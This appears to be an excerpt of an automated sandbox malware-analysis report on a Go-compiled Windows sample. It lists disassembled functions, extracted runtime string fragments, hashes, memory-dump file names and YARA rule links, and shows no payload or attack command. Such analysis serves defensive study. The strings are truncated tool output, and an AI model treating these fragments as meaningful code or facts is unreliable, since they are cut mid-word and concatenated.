                                                                                • String ID: *$persistentalloc: align is not a power of 2runtime: blocked write on closing polldescsync/atomic: store of nil value into Valuetest executed panic(nil) or runtime.Goexitunexpected signal during runtime executionx509: %q cannot be encoded as an IA5Stringx509: RS$persistentalloc: align is too largepidleput: P has non-empty run queue of non-slice typeruntime: close polldesc w/o unblockruntime: createevent failed; errno=ryuFtoaFixed32 called with prec > 9strings.Reader.Seek: invalid whencesuperfluous lea$persistentalloc: size == 0pkcs7: input data is empty required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to metoo many colons in address$runtime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x]x509: certificate is valid for x509: malformed GeneralizedTimex509: malformed subjectUniqueIDx509: malfor
                                                                                • API String ID: 0-4232192069
                                                                                • Opcode ID: cb3a85f24be706df4126fe0c5a53b48933aded2325aa0c10187925c1f823efe3
                                                                                • Instruction ID: 620cd47b9ea8e65088208e9fcffbdce4d274a269190979ff0270eafb1946188b
                                                                                • Opcode Fuzzy Hash: cb3a85f24be706df4126fe0c5a53b48933aded2325aa0c10187925c1f823efe3
                                                                                • Instruction Fuzzy Hash: 237145B4608349CFC704DF65D1907AABBE5FB88304F14886DE88987352E7B5E949CF92
                                                                                Function 00ACCA2A Relevance: 6.4, Strings: 5, Instructions: 152COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • pacer: assist ratio=preempt off reason: .makeFuncStubruntime: double waitruntime: unknown pc selectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer , xrefs: 00ACCBD8
                                                                                • MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-Bytes, xrefs: 00ACCCA3
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00ACCCCD
                                                                                • ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTA, xrefs: 00ACCC6C
                                                                                • (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicF, xrefs: 00ACCBFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicF$ MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-Bytes$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTA$pacer: assist ratio=preempt off reason: .makeFuncStubruntime: double waitruntime: unknown pc selectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer
                                                                                • API String ID: 0-2792116008
                                                                                • Opcode ID: e7ef2c75190840909edd228b263835583ca77907a8372ac8a3119b596a034bb0
                                                                                • Instruction ID: 4d8c0246e74d40e991ec4d707b5ae66f5e251990fe4feb362578d99b7ea18f7e
                                                                                • Opcode Fuzzy Hash: e7ef2c75190840909edd228b263835583ca77907a8372ac8a3119b596a034bb0
                                                                                • Instruction Fuzzy Hash: 0C710874908B468FC314EF29D194A6EBBF5BF89344F418A2DF88997351EB70D884DB42
                                                                                Function 00AD7C90 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • bad summary databad symbol tablecastogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemess, xrefs: 00AD7ECD
                                                                                • runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: in, xrefs: 00AD7E67
                                                                                • , npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayImportDeleteFileWDives_AkuruExitProcessFieldLayoutFreeLibraryGOTRACE, xrefs: 00AD7E23
                                                                                • , p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ARM little endianAdjustTokenGroupsAssemblyProcessorCertFindExtensionCreateFileMappingCreateStdDispatchCryptDecodeObjectDispGetIDsOfNamesDllGe, xrefs: 00AD7E99
                                                                                • runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirec, xrefs: 00AD7DF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: , npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayImportDeleteFileWDives_AkuruExitProcessFieldLayoutFreeLibraryGOTRACE$, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ARM little endianAdjustTokenGroupsAssemblyProcessorCertFindExtensionCreateFileMappingCreateStdDispatchCryptDecodeObjectDispGetIDsOfNamesDllGe$bad summary databad symbol tablecastogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemess$runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirec$runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: in
                                                                                • API String ID: 0-4196405881
                                                                                • Opcode ID: c91fb39681a87c092601d69e61770dbfe416f760feff7a881a892b917516c1ff
                                                                                • Instruction ID: d80923e6abe949bd73e3320f88bd1d05bfd2bbae847acfe585629636c0ac9762
                                                                                • Opcode Fuzzy Hash: c91fb39681a87c092601d69e61770dbfe416f760feff7a881a892b917516c1ff
                                                                                • Instruction Fuzzy Hash: F06103B59097458FC304EF25D19166EBBE1FF88308F90896EE8998B342E774D945CF82
                                                                                Function 00ACCA11 Relevance: 6.4, Strings: 5, Instructions: 132COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • pacer: assist ratio=preempt off reason: .makeFuncStubruntime: double waitruntime: unknown pc selectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer , xrefs: 00ACCBD8
                                                                                • MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-Bytes, xrefs: 00ACCCA3
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00ACCCCD
                                                                                • ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTA, xrefs: 00ACCC6C
                                                                                • (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicF, xrefs: 00ACCBFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicF$ MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-Bytes$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTA$pacer: assist ratio=preempt off reason: .makeFuncStubruntime: double waitruntime: unknown pc selectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer
                                                                                • API String ID: 0-2792116008
                                                                                • Opcode ID: 584f748d6de9bf0f52004b66f9a5314558a77fe505f73cb1605a6202edcbd29b
                                                                                • Instruction ID: 6fac53c24030a656832ad3b954073364bfbf072d51e890e599bf57e5988041d9
                                                                                • Opcode Fuzzy Hash: 584f748d6de9bf0f52004b66f9a5314558a77fe505f73cb1605a6202edcbd29b
                                                                                • Instruction Fuzzy Hash: E25112B4908B458FC314EF29D19476EBBE0BF89348F41492DF8899B352EB70D884CB52
                                                                                Function 00AC2AD0 Relevance: 6.4, Strings: 5, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • span has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p statex509: malformed issuerzero length BIT STRINGzlib: invalid checksum) must be a power of 223283064365386962, xrefs: 00AC2C7B
                                                                                • (, xrefs: 00AC2CC6
                                                                                • bad sweepgen in refillcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: internal inconsistencyinvalid number base %dkernel32.dll not f, xrefs: 00AC2CA7
                                                                                • refill of span with free space remaining : FieldByName of non-struct type rsa: internal error: inconsistent length : first argument is : duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memo, xrefs: 00AC2CBD
                                                                                • out of memoryparsing time powrprof.dll, xrefs: 00AC2C91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ($bad sweepgen in refillcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: internal inconsistencyinvalid number base %dkernel32.dll not f$out of memoryparsing time powrprof.dll$refill of span with free space remaining : FieldByName of non-struct type rsa: internal error: inconsistent length : first argument is : duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memo$span has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p statex509: malformed issuerzero length BIT STRINGzlib: invalid checksum) must be a power of 223283064365386962
                                                                                • API String ID: 0-3082307548
                                                                                • Opcode ID: 2007d24cae37390a0cba26dbe02d5d9fdcfc1be5e583c2a86f6a97e619adb30a
                                                                                • Instruction ID: 6ed17bd0367f9a16007971f89b447cec0d4632974dd9e171d9b05d6e53f86ad7
                                                                                • Opcode Fuzzy Hash: 2007d24cae37390a0cba26dbe02d5d9fdcfc1be5e583c2a86f6a97e619adb30a
                                                                                • Instruction Fuzzy Hash: 2C513AB45083048FC704EF25D590B6ABBE1FF84704F4189ADE8968B392DB74D959CF92
                                                                                Function 00ACF4C0 Relevance: 6.4, Strings: 5, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • % util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNativeRejangSCHED STREETSt, xrefs: 00ACF612
                                                                                • KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte li, xrefs: 00ACF5E8
                                                                                • [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseC, xrefs: 00ACF646
                                                                                • KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b, xrefs: 00ACF5B1
                                                                                • (forced) B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail =, xrefs: 00ACF66F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
